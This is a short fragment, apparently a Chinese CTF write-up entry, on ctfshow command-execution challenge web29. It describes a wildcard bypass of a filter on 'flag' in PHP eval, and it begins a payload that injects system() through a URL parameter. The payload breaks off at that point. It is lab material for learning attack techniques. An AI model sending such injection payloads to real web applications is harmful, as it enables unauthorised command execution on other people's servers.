八月 22, 2021

ctfshow命令执行篇

web29(通配符绕过) eval执行PHP代码,过滤了大小写的flag: 123?c=system('...